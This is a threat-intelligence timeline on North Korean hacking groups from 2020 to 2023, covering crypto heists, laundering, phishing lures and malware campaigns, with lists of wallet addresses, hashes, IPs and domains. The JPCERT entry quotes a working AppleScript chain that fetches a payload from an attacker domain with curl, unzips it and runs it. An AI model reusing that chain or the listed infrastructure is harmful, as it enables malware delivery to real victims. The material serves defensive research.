  • By using spear-phishing methods, members of Lazarus Group acted as health officials and reached out to a number of pharmaceutical companies. Once trust was gained, Lazarus Group sent a number of malicious links to the companies. It is unconfirmed what the goal of the attack was, but it is suspected that they were looking to sell data for profit, extort the companies and their employees, and give foreign entities access to proprietary COVID-19 Research.
  • https://hvs-consulting.de/public/ThreatReport-Lazarus.pdf

2021

2021 Chainalysis Report: North Korean Hackers Crypto Holdings Reach All-time High

  • Date:: 2021-01-01
  • https://go.chainalysis.com/rs/503-FAP-074/images/Crypto-Crime-Report-2022.pdf
  • North Korean cybercriminals had a banner year in 2021, launching at least seven attacks on cryptocurrency platforms that extracted nearly $400M worth of digital assets last year.
  • These attacks targeted primarily investment firms and centralized exchanges, and made use of phishing lures, code exploits, malware, and advanced social engineering to siphon funds out of these organizations’ internet-connected “hot” wallets into DPRK-controlled addresses.
  • Once North Korea gained custody of the funds, they began a careful laundering process to cover up and cash out. These complex tactics and techniques have led many security researchers to characterize cyber actors for the Democratic People’s Republic of Korea (DPRK) as advanced persistent threats (APTs). This is especially true for APT 38, also known as “Lazarus Group,” which is led by DPRK’s primary intelligence agency, the US- and UN-sanctioned Reconnaissance General Bureau.
  • While we will refer to the attackers as North Korean-linked hackers more generally, many of these attacks were carried out by the Lazarus Group in particular. Lazarus Group first gained notoriety from its Sony Pictures and WannaCry cyberattacks, but it has since concentrated its efforts on cryptocurrency crime—a strategy that has proven immensely profitable.
  • From 2018 on, the group has stolen and laundered massive sums of virtual currencies every year, typically in excess of $200M. The most successful individual hacks, one on KuCoin and another on an unnamed cryptocurrency exchange, each netted more than $250M alone.
  • Interestingly, in terms of dollar value, Bitcoin now accounts for less than one fourth of the cryptocurrencies stolen by DPRK.
  • In 2021, only 20% of the stolen funds were Bitcoin, whereas 22% were either ERC-20 tokens or altcoins. And for the first time ever, Ether accounted for a majority of the funds stolen at 58%.
  • The growing variety of cryptocurrencies stolen has necessarily increased the complexity of DPRK’s cryptocurrency laundering operation. Today, DPRK’s typical laundering process is as follows:
  • More than 65% of DPRK’s stolen funds were laundered through mixers this year, up from 42% in 2020 and 21% in 2019, suggesting that these threat actors have taken a more cautious approach with each passing year.
  • Why mixers? DPRK is a systematic money launderer, and their use of multiple mixers is a calculated attempt to obscure the origins of their ill-gotten cryptocurrencies while offramping into fiat. Why DeFi? DeFi platforms like DEXs provide liquidity for a wide range of ERC-20 tokens and altcoins that may not otherwise be convertible into cash. When DPRK swaps these coins for ETH or BTC they become much more liquid, and a larger variety of mixers and exchanges become usable. What’s more, DeFi platforms don’t take custody of user funds and many do not collect know-your-customer (KYC) information, meaning that cybercriminals can use these platforms without having their assets frozen or their
  • DPRK’s stolen fund stockpile: $170M worth of old, unlaundered cryptocurrency holdings. Chainalysis has identified $170M in current balances—representing the stolen funds of 49 separate hacks spanning from 2017 to 2021—that are controlled by North Korea but have yet to be laundered through services. The ten largest balances by dollar value are listed below.
  • Of DPRK’s total holdings, roughly $35M came from attacks in 2020 and 2021. By contrast, more than $55M came from attacks carried out in 2016—meaning that DPRK has massive unlaundered balances as much as six years old.

Google TAG report on a new campaign targeting security researchers

  • Date:: 2021-01-25
  • government-backed entity based in North Korea. Social media targetting.
  • the actors established a research blog and multiple Twitter profiles to interact with potential targets. They've used these Twitter profiles for posting links to their blog, posting videos of their claimed exploits and for amplifying and retweeting posts from other accounts that they control.
  • Their blog contains write-ups and analysis of vulnerabilities that have been publicly disclosed, including “guest” posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers.
  • After establishing initial communications, the actors would ask the targeted researcher if they wanted to collaborate on vulnerability research together, and then provide the researcher with a Visual Studio Project. Within the Visual Studio Project would be source code for exploiting the vulnerability, as well as an additional DLL that would be executed through Visual Studio Build Events. The DLL is custom malware that would immediately begin communicating with actor-controlled C2 domains. An example of the VS Build Event can be seen in the image below.
  • In addition to targeting users via social engineering, we have also observed several cases where researchers have been compromised after visiting the actors’ blog. In each of these cases, the researchers have followed a link on Twitter to a write-up hosted on blog.br0vvnn[.]io, and shortly thereafter, a malicious service was installed on the researcher’s system and an in-memory backdoor would begin beaconing to an actor-owned command and control server. At the time of these visits, the victim systems were running fully patched and up-to-date Windows 10 and Chrome browser versions.
  • These actors have used multiple platforms to communicate with potential targets, including Twitter, LinkedIn, Telegram, Discord, Keybase and email
  • https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/
  • https://apnews.com/article/malware-media-north-korea-social-media-south-korea-7dc8a5a9a3576005a615524d1ba439aa

Microsoft: ZINC attacks against security researchers

Daily NK: Kim Jong Un is directly handling results of new COVID-19 hacking organization's work

FBI + CISA: Report on Operation AppleJeus - Celas Trade Pro, JMT Trading, Union Crypto, Kupay Wallet, CoinGoTrade, Dorusio, Ants2Whale

Ghaleb Alaumary + Ramon Abbas (Hushpuppi) named in ‘North Korean-perpetrated cyber-enabled’ heist

  • Date:: 2021-02-20
  • https://justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and
  • Nigerian Instagram celebrity Ramon Abbas, also known as Hushpuppi, has been named in another case in the United States, this time with North Korean hackers involved.
  • The United State Justice Department said Hushpupp conspired with a Canadian-American citizen Ghaleb Alaumary and others to launder funds from a North Korean-perpetrated cyber-enabled heist from a Maltese bank in February 2019.
  • Hushpuppi is currently facing separate trial for conspiring “to launder hundreds of millions of dollars from BEC frauds and other scams.”
  • “The affidavit also alleges that Abbas conspired to launder funds stolen in a $14.7 million cyber-heist from a foreign financial institution in February 2019, in which the stolen money was sent to bank accounts around the world.
  • Federal prosecutors today also unsealed a charge against Ghaleb Alaumary, 37, of Mississauga, Ontario, Canada, for his role as a money launderer for the North Korean conspiracy, among other criminal schemes. Alaumary agreed to plead guilty to the charge, which was filed in the U.S. District Court in Los Angeles on Nov. 17, 2020. Alaumary was a prolific money launderer for hackers engaged in ATM cash-out schemes, cyber-enabled bank heists, business email compromise (BEC) schemes, and other online fraud schemes. Alaumary is also being prosecuted for his involvement in a separate BEC scheme by the U.S. Attorney’s Office for the Southern District of Georgia.
  • With respect to the North Korean co-conspirators’ activities, Alaumary organized teams of co-conspirators in the United States and Canada to launder millions of dollars obtained through ATM cash-out operations, including from BankIslami and a bank in India in 2018.
  • Alaumary also conspired with Ramon Olorunwa Abbas, aka “Ray Hushpuppi,” and others to launder funds from a North Korean-perpetrated cyber-enabled heist from a Maltese bank in February 2019. Last summer, the U.S. Attorney’s Office in Los Angeles charged Abbas in a separate case alleging that he conspired to launder hundreds of millions of dollars from BEC frauds and other scams.

Mun Chol-myon

A NEW NFT&DeFi TECH (PROTECTED).docx

Lazarus BTC Changer

AppleJeus: Analysis of North Korea’s Cryptocurrency Malware

The Incredible Rise of North Korea’s Hacking Army - Lazarus group’s criminal enterprises including cryptocurrency exchange heists and ransomware attacks

ClearSky: Attributing CryptoCore Attacks Against Crypto Exchanges to Lazarus

ClearSky: Report on the Crypto Core APT group attributing it to the North Korean Lazarus APT

Andariel evolves to target South Korea with ransomware

  • Date:: 2021-06-15
  • https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/
  • In April 2021, we observed a suspicious Word document with a Korean file name and decoy. It revealed a novel infection scheme and an unfamiliar payload. While we were doing our research into these findings, Malwarebytes published a nice report with technical details about the same series of attacks, which they attributed to the Lazarus group. After a deep analysis, we came to a more precise conclusion: the Andariel group was behind these attacks. Andariel was designated by the Korean Financial Security Institute as a sub-group of Lazarus.
  • Our attribution is based on the code overlaps between the second stage payload in this campaign and previous malware from the Andariel group. Apart from the code similarity, we found an additional connection with the Andariel group. Each threat actor has characteristics when they interactively work with a backdoor shell in the post-exploitation phase. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity.
  • Mid-2020 onwards, they've leveraged malicious Word documents and files mimicking PDF documents as infection vectors. Notably, in addition to the final backdoor, we discovered one victim getting infected with custom ransomware. It adds another facet to this Andariel campaign, which also sought financial profit in a previous operation involving the compromise of ATMs.

HushPuppi - The Fall Of The Billionaire Gucci Master

Rapid Change of Stablecoin (Protected).docx secure.azureword[.]com Z Venture Capital Presentation(Protected).docx

Ghaleb Alaumary sentenced to 11 years in jail for laundering funds such as those coming from a banking heist by North Korean actors

2022

CVE-2022-0609 Earliest sighting of this particular kit

  • Date:: 2022-01-04

Kapersky Report: SnatchCrypto Campaign

North Korean Hackers Have Prolific Year as Their Unlaundered Cryptocurrency Holdings Reach All-time High

North Korea Hacked Him. So He Took Down Its Internet

CVE-2022-0609 reported by Google TAGs Clément Lecigne - use after free animation

  • Date:: 2022-02-10
  • TAG discovered two distinct North Korean attacker groups exploiting remote execution vulnerability
  • Operation Dream Job + Operation AppleJeus

CVE-2022-0609 Chrome Update Released - use after free animation

  • Date:: 2022-02-14

What Wicked Webs We Un-weave

CVE-2022-1096 reported by anon - type confusion V8

  • Date:: 2022-03-23

FireEye/Mandriant - Not So Lazarus: Mapping DPRK Cyber Threat Groups to Government Organizations

  • Date:: 2022-03-23

CVE-2022-0609 Google posts update abt zero day CVE-2022-0609 - Operation Dream Job and Operation AppleJeus

  • Date:: 2022-03-24
  • Campaigns targeting U.S. based organizations spanning news media, IT, cryptocurrency and fintech industries.
  • Targeted over 250 individuals working for 10 different news media, domain registrars, web hosting providers and software vendors. The targets received emails claiming to come from recruiters at Disney, Google and Oracle with fake potential job opportunities. The emails contained links spoofing legitimate job hunting websites like Indeed and ZipRecruiter.
  • Operation AppleJeus targeted over 85 users in cryptocurrency and fintech industries leveraging the same exploit kit. This included compromising at least two legitimate fintech company websites and hosting hidden iframes to serve the exploit kit to visitors. In other cases, we observed fake websites — already set up to distribute trojanized cryptocurrency applications — hosting iframes and pointing their visitors to the exploit kit.
  • The campaign begins by sending them phishing emails purporting to be from recruiters at Disney, Google, and Oracle, offering them false employment opportunities. The emails included links to bogus job-search websites such as Indeed and ZipRecruiter. Targets who clicked on the included malicious URLs were infected with drive-by browser malware downloads. The North Korean groups were utilizing an exploit kit (1️⃣ CVE-2022-0609) with hidden iframes embedded into a variety of websites. The attack kit may fingerprint target devices by collecting details like user-agent and screen resolution. After that the exploit kit executes a Chrome remote code execution hack capable of bypassing the lauded Chrome sandbox to move out onto the system.
  • https://blog.google/threat-analysis-group/countering-threats-north-korea/

CVE-2022-1096 Chrome Update Released - type confusion V8

  • Date:: 2022-03-25

Lazarus Trojanized DeFi app for delivering malware

APT Group Lazarus Distributing Korean Phishing Lures to Feel Out Cryptocurrency Users

  • Date:: 2022-04-12
  • In this attack, Lazarus built a type of decoy document containing an “AhnLab ” icon and prompt information. The prompts for these documents vary, but the common goal is to trick victims into enabling Office’s document editing capabilities. AhnLab is a cyber security vendor with its headquarters in South Korea. Lazarus uses the name to increase the persuasiveness of the decoy document.
  • Another type of decoy document contains Binance icons and related tips. Binance is a cryptocurrency trading platform.

CVE-2022-1364 Reported by Google TAG's Clément Lecigne

  • Date:: 2022-04-13
  • Type Confusion, V8 Engine

CVE-2022-1364 Chrome Update Released, everyone told to update urgently

Ronin Bridge Hack Attributed to Lazarus Group, addresses added to OFAC list

Tornado Cash uses Chainalysis Oracle to blcok OFAC addresses (from frontend)

TraderTraitor: North Korean State-Sponsored APT Targets Blockchain Companies

How the DPRK became a hacking powerhouse and why it loves crypto

Guidance on the DPRK IT Workers

Insight: Crypto crash threatens North Korea's stolen funds as it ramps up weapons tests

Here’s how North Korean operatives are trying to infiltrate US crypto firms

AppleSeed Disguised as Purchase Order and Request Form Being Distributed

US disrupts North Korean hackers that targeted hospitals

AppleSeed Being Distributed to Maintenance Company of Military Bases

Proofpoint: Macro-Blocking & How Threat Actors Are Adapting

Word File Provided as External Link When Replying to Attacker’s Email (Kimsuky)

U.S. Treasury Sanctions Notorious Virtual Currency Mixer Tornado Cash

Suspected Tornado Cash developer arrested in Netherlands

Andariel deploys DTrack and Maui ransomware

UNC4034 Spreading Trojanized Versions of PuTTY Client Application - DPRK Job Opportunity Phishing via WhatsApp

Lazarus ‘Operation In(ter)ception’ Targets macOS Users Dreaming of Jobs in Crypto

ESET: Lazarus & BYOVD: Evil To The Windows Core

Microsoft: ZINC weaponizing open-source software

  • Date:: 2022-09-29
  • https://microsoft.com/en-us/security/blog/2022/09/29/zinc-weaponizing-open-source-software/
  • ZINC, Diamond Sleet
  • Beginning in June 2022, ZINC employed traditional social engineering tactics by initially connecting with individuals on LinkedIn to establish a level of trust with their targets. Upon successful connection, ZINC encouraged continued communication over WhatsApp, which acted as the means of delivery for their malicious payloads.
  • Weaponized wide range of open-source software including PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and muPDF/Subliminal Recording software installer for these attacks
  • Observed attempting to move laterally and exfiltrate collected information from victim networks. The actors have successfully compromised numerous organizations since June 2022.
  • The ongoing campaign related to the weaponized PuTTY was also reported by Mandiant earlier this month. Due to the wide use of the platforms and software that ZINC utilizes in this campaign, ZINC could pose a significant threat to individuals and organizations across multiple sectors and regions.

Analysis Report on Lazarus Group's Rootkit Malware That Uses BYOVD

U.S. targets North Korean fuel procurement network for breaching UN sanctions

Lazarus Group Uses the DLL Side-Loading Technique (mi.dll)

With more than $3B already stolen, 2022 is on pace to become crypto’s ‘biggest year for hacking on record’

Malicious app suspected to be created by a North Korean hacker organization aimed at stealing cryptocurrency discovered

Distribute AppleSeed to companies related to nuclear power plants

Lazarus Group had been observed targeting public and private sector research organizations, medical research and energy sectors, as well as their supply chains. This campaign, dubbed “No Pineapple”, focused on intelligence-gathering, starting with an attack on a company that was exploited through CVE-2022-27925 (remote code execution) and CVE-2022-37042 (authentication bypass) – two vulnerabilities affecting the digital collaboration

Volexity: ₿uyer ₿eware: Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware

Microsoft: DEV-0139 launches targeted attacks against the cryptocurrency industry

  • Date:: 2022-12-06
  • https://microsoft.com/en-us/security/blog/2022/12/06/dev-0139-launches-targeted-attacks-against-the-cryptocurrency-industry/
  • Citrine Sleet, OKX Fee Adjustment
  • We are also seeing more complex attacks wherein the threat actor shows great knowledge and preparation, taking steps to gain their target’s trust before deploying payloads. For example, Microsoft recently investigated an attack where the threat actor, tracked as DEV-0139, took advantage of Telegram chat groups to target cryptocurrency investment companies. DEV-0139 joined Telegram groups used to facilitate communication between VIP clients and cryptocurrency exchange platforms and identified their target from among the members. The threat actor posed as representatives of another cryptocurrency investment company, and in October 2022 invited the target to a different chat group and pretended to ask for feedback on the fee structure used by cryptocurrency exchange platforms. The threat actor had a broader knowledge of this specific part of the industry, indicating that they were well prepared and aware of the current challenge the targeted companies may have.
  • After gaining the target’s trust, DEV-0139 then sent a weaponized Excel file with the name OKX Binance & Huobi VIP fee comparision.xls which contained several tables about fee structures among cryptocurrency exchange companies. The data in the document was likely accurate to increase their credibility. This weaponized Excel file initiates the following series of activities:
  • A malicious macro in the weaponized Excel file abuses UserForm of VBA to obfuscate the code and retrieve some data.
  • The malicious macro drops another Excel sheet embedded in the form and executes it in invisible mode. The said Excel sheet is encoded in base64, and dropped into C:\ProgramData\Microsoft Media\ with the name VSDB688.tmp
  • The file VSDB688.tmp downloads a PNG file containing three executables: a legitimate Windows file named logagent.exe, a malicious version of the DLL wsock32.dll, and an XOR encoded backdoor.
  • The file logagent.exe is used to sideload the malicious wsock32.dll, which acts as a DLL proxy to the legitimate wsock32.dll. The malicious DLL file is used to load and decrypt the XOR encoded backdoor that lets the threat actor remotely access the infected system.
  • Telegram Group: <NameOfTheTargetedCompany> <> OKX Fee Adjustment
  • OKX Binance & Huobi VIP fee comparision.xls - abca3253c003af67113f83df2242a7078d5224870b619489015e4fde060acad0

Seoul: North Korean hackers stole $1.2B in virtual assets

SlowMist: Investigation of North Korean APT’s Large-Scale Phishing Attack on NFT Users

2023

Lazarus - The suspected APT-C-26 (Lazarus) organization conducts attack activity analysis through cryptocurrency wallet promotion information

Kimsuky - North Korea’s Cryptocurrency Craze and its Impact on U.S. Policy

Malware Disguised as a Manuscript Solicitation Letter (Targeting Security-Related Workers)

FBI: Confirms Lazarus Group Cyber Actors Responsible for Harmony's Horizon Bridge Currency Theft

Proofpoint: TA444 - The APT Startup Aimed at Acquisition (of Your Funds)

CISA: Ransomware Attacks on Critical Infrastructure Fund DPRK Malicious Cyber Activities

  • Date:: 2023-02-09
  • https://cisa.gov/news-events/cybersecurity-advisories/aa23-040a
  • 14hVKm7Ft2rxDBFTNkkRC3kGstMGp2A4hk
  • 16ENLdHbnmDcEV8iqN4vuyZHa7sSdYRh76
  • 16sYqXancDDiijcuruZecCkdBDwDf4vSEC
  • 1FX4W9rrG4F3Uc7gJ18GCwGab8XuW8Ajy2
  • 1J8spy62o7z2AjQxoUpiCGnBh5cRWKVWJC
  • 1KCwfCUgnSy3pzNX7U1i5NwFzRtth4bRBc
  • 1KmWW6LgdgykBBrSXrFu9kdoHz95Fe9kQF
  • 1MTHBCrBKYEthfa16zo9kabt4f9jMJz8Rm
  • 1N6JphHFaYmYaokS5xH31Z67bvk4ykd9CP
  • 1NqihEqYaQaWiZkPVdSMiTbt7dTy1LMxgX
  • bc1q3wzxvu8yhs8h7mlkmf7277wyklkah9k4sm9anu
  • bc1q498fn0gauj2kkjsg35mlwk2cnxhaqlj7hkh8xy
  • bc1q6024d73h48fnhwswhwt3hqz2lzw6x99q0nulm4
  • bc1q6qfkt06xmrpclht3acmq00p7zyy0ejydu89zwv
  • bc1q7qry3lsrphmnw3exs7tkwzpvzjcxs942aq8n0y
  • bc1q80vc4yjgg6umedkut3e9mhehxl4q4dcjjyzh59
  • bc1q8t69gpxsezdcr8w6tfzp3jeptq4tcp2g9d0mwy
  • bc1q8xyt4jxhw7mgqpwd6qfdjyxgvjeuz57jxrvgk9
  • bc1q9h7yj79sqm4t536q0fdn7n4y2atsvvl22m28ep
  • bc1qagaayd57vr25dlqgk7f00nhz9qepqgnlnt4upu
  • bc1qavrtge4p7dmcrnvhlvuhaarx8rek76wxyk7dgg
  • bc1qcmlcxfsy0zlqhh72jvvc4rh7hvwhx6scp27na0
  • bc1qcp557vltuu3qc6pk3ld0ayagrxuf2thp3pjzpe
  • bc1qcywkd7zqlwmjy36c46dpf8cq6ts6wgkjx0u7cn
  • bc1qg3zlxxhhcvt6hkuhmqml8y9pas76cajcu9ltdl
  • bc1qhfmqstxp3yp9muvuz29wk77vjtdyrkff4nrxpu
  • bc1qj6y72rk039mqpgtcy7mwjd3eum6cx6027ndgmd
  • bc1qk0saaw7p0wrwla6u7tfjlxrutlgrwnudzx9tyw
  • bc1ql8wsflrjf9zlusauynzjm83mupq6c9jz9vnqxg
  • bc1qlqgu2l2kms5338zuc95kxavctzyy0v705tpvyc
  • bc1qmge6a7sp659exnx78zhm9zgrw88n6un0rl9trs
  • bc1qn7a3g23nzpuytchyyteyhkcse84cnylznl3j32
  • bc1qnh8scrvuqvlzmzgw7eesyrmtes9c5m78duetf3
  • bc1qnz4udqkumjghnm2a3zt0w3ep8fwdcyv3krr3jq
  • bc1qu0pvfmtxawm8s99lcjvxapungtsmkvwyvak6cs
  • bc1qunqnjdlvqkjuhtclfp8kzkjpvdz9qnk898xczp
  • bc1quvnaxnpqlzq3mdhfddh35j7e7ufxh3gpc56hca
  • bc1qwdvexlyvg3mqvqw7g6l09qup0qew80wjj9jh7x
  • bc1qx60ec3nfd5yhsyyxkzkpts54w970yxj84zrdck
  • bc1qxrpevck3pq1yzrx2pq2rkvkvy0jnm56nzjv6pw
  • bc1qy6su7vrh7ts5ng2628escmhr98msmzg62ez2sp
  • bc1qyue2pgjk09ps7qvfs559k8kee3jkcw4p4vdp57
  • LZ1VNJfn6mWjPzkCyoBvqWaBZYXAwn135

Kimsuky: Malware Disguised as Normal Documents

  • Date:: 2023-02-15
  • Same tactics used as in Malware Disguised as a Manuscript Solicitation Letter (Targeting Security-Related Workers; in this case, the threat actor used an image that prompts users to execute the macro.
  • https://asec.ahnlab.com/en/47585/

Lazarus Anti-Forensic Techniques

  • Date:: 2023-02-23
  • The Lazarus Group carried out anti-forensics to conceal their malicious activities. They transmitted a configuration file with C2 information and a PE file that communicates with the C2 server in encrypted forms to evade detection by security products. The encrypted files operate after being decrypted onto the memory by the loader file. They then receive additional files from the C2 and perform malicious actions.
  • https://asec.ahnlab.com/en/48223/

Økokrim has seized almost NOK 60 million in cryptocurrency. This is the largest amount of cryptocurrency ever seized by the Norwegian police

WinorDLL64 - backdoor from the vast Lazarus arsenal

Mandiant:: Stealing the LIGHTSHOW - LIGHTSHIFT and LIGHTSHOW - North Korea's UNC2970

Kimsuky - CHM Malware Disguised as North Korea-related Questionnaire (Kimsuky)

Kimsuky - OneNote Malware Disguised as Compensation Form

Kimsuky - Distributes Malware Disguised as Profile Template (GitHub)

Inside the international sting operation to catch North Korean crypto hackers

Lazarus DeathNote campaign

Google TAG - How we’re protecting users from government-backed attacks from North Korea

Jamf - BlueNoroff APT group targets macOS with ‘RustBucket’ Malware

North Korean Foreign Trade Bank Representative Charged in Crypto Laundering Conspiracies

Half of North Korean missile program funded by cyberattacks and crypto theft, White House says

JPCERT/CC Eyes: Attack Trends Related to DangerousPassword

  • Date:: 2023-05-12
  • https://blogs.jpcert.or.jp/en/2023/05/dangerouspassword.html
  • DangerousPassword, CryptoMimic, SnatchCrypto
  • Attacks by sending malicious CHM files from LinkedIn
  • Attacks using OneNote files
  • Attacks using virtual hard disk files
  • Attacks targeting macOS:
  • An AppleScript is contained, and it downloads an unauthorized application in main.scpt using the curl command and then executes it.
  • do shell script “curl -o /users/shared/1.zip https://cloud.dnx.capital/ZyCws4dD_zE/aUhUJV@p6P/S9XrRH9%2B/R51g4b5Kjj/abnY%3D -A curl"
  • do shell script "unzip -o -d /users/shared /users/shared/1.zip"
  • do shell script “open \"/users/shared/Internal PDF Viewer.app\""
  • cloud.dnx[.]capital

APT-C-28 (ScarCruft) Organization Uses Malicious Documents to Deliver RokRAT Attack Activity Analysis

Kimsuky - Phishing Attacks Targetting North Korea-Related Personnel

US sanctions orgs behind North Korea’s ‘illicit’ IT worker army

North Korea is now Mining Crypto to Launder Its Stolen Loot

  • Date:: 2023-05-23
  • Today, cybersecurity firm Mandiant published a report on a prolific North Korean state-sponsored hacking group it's now calling APT43, sometimes known by the names Kimsuky and Thallium. The group, whose activities suggest its members work in the service of North Korea's Reconnaissance General Bureau spy agency, has been primarily focused on espionage, hacking think tanks, academics, and private industry from the US to Europe, South Korea, and Japan since at least 2018, mostly with phishing campaigns designed to harvest credentials from victims and plant malware on their machines.
  • Like many North Korean hacker groups, APT43 also maintains a sideline in profit-focused cybercrime, according to Mandiant, stealing any cryptocurrency that can enrich the North Korean regime or even just fund the hackers' own operations. And as regulators worldwide have tightened their grip on exchanges and laundering services that thieves and hackers use to cash out criminally tainted coins, APT43 appears to be trying out a new method to cash out the funds it steals while preventing them from being seized or frozen: It pays that stolen cryptocurrency into “hashing services” that allow anyone to rent time on computers used to mine cryptocurrency, harvesting newly mined coins that have no apparent ties to criminal activity.
  • https://web.archive.org/web/20230328150400/https://wired.com/story/north-korea-apt43-crypto-mining-laundering/

Bluenoroff’s RustBucket campaign (SnatchCrypto)

  • Date:: 2023-05-23
  • https://blog.sekoia.io/bluenoroffs-rustbucket-campaign
  • cloud.dnx[.]capital
  • The RustBucket infection chain consists of a macOS installer that installs a backdoored, yet functional, PDF reader. The fake PDF reader then requires opening a specific PDF file that operates as a key to trigger the malicious activity.
  • When opened in a classical PDF reader, the PDF document displays a message asking the user to open the document in the proper reader (i.e. the backdoored one). When opened in this reader, the PDF displays a nine pages document about a venture capital company that appears to be the printout of a legit company’s website. The fake PDF reader uses a hardcoded 100-bytes XOR key to decrypt the new content of the document and the C2 server configuration.
  • During our investigation on the macOS variant, Sekoia.io analysts identified a .NET version of RustBucket, with a similar GUI, developed using the library DevExpress.XtraPdfViewer. The malware was embedded in a ZIP archive containing the PDF reader and the “key” PDF requiring user interaction.
  • Bluenoroff’s observed initial intrusion vector includes phishing emails, as well as leveraging social networks such as LinkedIn. During our investigations, we identified the domain sarahbeery.docsend[.]me, further analysis led us to the following LinkedIn profile:
  • RustBucket MacOS version - 2023-05-08 - Jump Crypto Investment Agreement
    • Jump Crypto Investment Agreement.zip ba5e982596fd03bea98f5de96c1258e56327358e134ceecd1d68e54480533d92
    • Internal PDF Viewer.app.zip 3ed9f34fedca38130776e5adabae363ac797fe89087e04e0c93d83fd62a7a9a4
    • ZIP 6ca3a2f4cef27dac9d28c1ec2b29a8fa09dfc6dbbaf58e00dddbf5c1dd3b3cc3
    • Mach-O - Internal PDF Viewer c28e4031129f3e6e5c6fbd7b1cebd8dd21b6f87a8564b0fb9ee741a9b8bc0197
    • Mach-O e2f177b8806923f21a93952b61aedbeb02d829a67a820a7aab5ee72512e3d646
    • Mach-O d6d367453c513445313be7339666e4faeeebeae71620c187012ea5ae2901df34
    • PDF - Jump Crypto Investment Agreement.pdf (Key PDF) 5f00106f7f15e0ca00df4dbb0eeccd57930b4b81bc9aa3fca0c5af4eda339ab7
    • PDF - Readme.pdf (Instruction to use the fake reader) ebad7317e1b01c2231bdbf37dfebdf656e3c8706e719fd37b66f0170b3d5cae0
  • RustBucket MacOS version - 2023-05-02
    • ZIP Internal PDF Viewer.app.zip dda8a9e2a2e415be781a39fdf41f1551af2344f1b1a0ddf921d8aeba90343d1b
    • Mach-O Internal PDF Viewer 46db9f2fc879bf643a8f05e2b35879b235cbb04aa06fe548f0bc7c7c02483cf3
    • Mach-O 5072b28399c874f92e71793fa13207d946a28a2f5903365ac11ddf666d15d086
    • Mach-O 3f0d5ddca2657044f4763ae53c4f33c8a7814ba451b60d24430a126674125624
  • RustBucket MacOS version - 2023-04-23
    • cloud.dnx[.]capital
    • laos.hedgehogvc[.]us
    • 104.255.172[.]56
    • ZIP - Internal PDF Viewer 2.app.zip 61772375af1884fe73c5d154b8637dd62f26d23bc38d18462a88e2bbed483fd7
    • SCPT - main.scpt 7c66d2d75be43d2c17e75d37c39344a9b5d29ee5c5861f178aa7d9f34208eb48
    • ZIP - Internal PDF Viewer.zip ff8832355ae99ffd66d0fe9eda2d74efdf3ed87bb2a4c215b93ade93165f7c0b
    • ZIP - Internal PDF Viewer.app.zip 83f457bc81514ec5e3ea123fc237811a36da6ce7f975ad56d62e34af4d1f37c0
    • ZIP - Internal PDF Viewer 3.app.zip b68bf400a23b1053f54911a2b826d341f6bf87c26bea5e6cf21710ee569a7aab
    • Mach-O - PdfWriter 3b6f30369a4ee8bf9409d141b6d1b3fb4286c34984b5de005ed7431df549b17e
  • RustBucket MacOS version - 2023-04-21
    • Mach-O - 703517604263 - 9ca914b1cfa8c0ba021b9e00bda71f36cad132f27cf16bda6d937badee66c747
    • Mach-O - ec8f97d5595d92ec678ffbf5ae1f60ce90e620088927f751c76935c46aa7dc41
    • Mach-O - 7fccc871c889a4f4c13a977fdd5f062d6de23c3ffd27e72661c986fae6370387
  • RustBucket MacOS version - 2023-03-02
    • ZIP - Internal PDF Viewer.app.zip - b448381f244dc0072abd4f52e01ca93efaebb2c0a8ea8901c4725ecb1b2b0656
    • ZIP - Pdf Viewer.zip - c56a97efd6d3470e14193ac9e194fa46d495e3dddc918219cca530b90f01d11e
    • Mach-O - Internal PDF Viewer - bea33fb3205319868784c028418411ee796d6ee3dfe9309f143e7e8106116a49
  • RustBucket MacOS version - 2023-02-13 (creation date 2022-12-20)
    • ZIP - Pdf Viewer.zip - 0d6964fe763c2e6404cde68af2c5f86d34cf50a88bd81bc06bba739010821db0
    • ZIP - Internal PDF Viewer.app.zip - ea5fac3201a09c3c5c3701723ea9a5fec8bbc4f1f236463d651303f40a245452
    • ZIP - Internal PDF Viewer.app.zip - 9525f5081a5a7ab7d35cf2fb2d7524e0777e37fe3df62730e1e7de50506850f7
    • Mach-O - Internal PDF Viewer - e74e8cdf887ae2de25590c55cb52dad66f0135ad4a1df224155f772554ea970c
    • Mach-O - 38106b043ede31a66596299f17254d3f23cbe1f983674bf9ead5006e0f0bf880
    • Mach-O - 7981ebf35b5eff8be2f3849c8f3085b9cec10d9759ff4d3afd46990520de0407
  • RustBucket Windows version
    • ZIP - PdfViewer.zip 62a5c6a600051bca4f7b3d11508ca1f968006b71089c71bf87b83ea8b34188e3
    • PDF - DOJ Report on Bizlato Investigation.pdf 8e234482db790fa0a3d2bf5f7084ec4cfb74bffd5f6cbdc5abdbc1350f58e3fe
    • DLL - DevExpress.Xpr.v19.2.dll f603713bffb9e040bedfd0bb675ff5a6b3205d8bd4e1a3309ea6d1b608871184
    • DLL - DevExpress.XtraList.v19.2.dll 31cec2803bfc7750930d5864400388732a822da96c3f79c98ddee03949aa6a2d
    • EXE - PdfViewer.exe b3cb7d0b656e8e4852def8548d2cf1edc4e64116434e1f2d9c9b150ee0f9861e
    • safe.doc-share[.]cloud
    • 172.93.181[.]221
    • Key PDF file 2 - PDF - DOJ Report on Bizlato Investigation_asistant.pdf 07d206664a8d397273e69ce37ef7cf933c22e93b62d95b673d6e835876feba06
    • safe.doc-share[.]cloud
  • IPs and Domains:
    • 104.156.149[.]130 (2023-04-18)
    • 104.255.172.52 (2023-03-18)
    • 104.234.147[.]28 (2023-01-21)
    • 104.168.138.7 (2023-03-17)
    • 104.168.167[.]88 (2022-10-17)
    • 155.138.159.45 (2022-09-20)
    • 104.255.172[.]56 (2022-09-15 - 2023-04-11)
    • 172.93.181[.]221 (2022-12-28 - 2023-03-06)
    • 172.86.121[.]143 (2022-10-31 - 2022-12-21)
    • 172.86.121[.]130 (2022-10-25 - 2023-01-24)
    • 149.28.247[.]34 (2022-11-11 - 2022-11-11)
    • 152.89.247[.]87 (2022-09-15 - 2022-10-24)
    • 104.168.174[.]80 (2022-06-28 - 2022-09-16)
    • 149.248.52[.]31 (2022-08-05 - 2022-08-31)
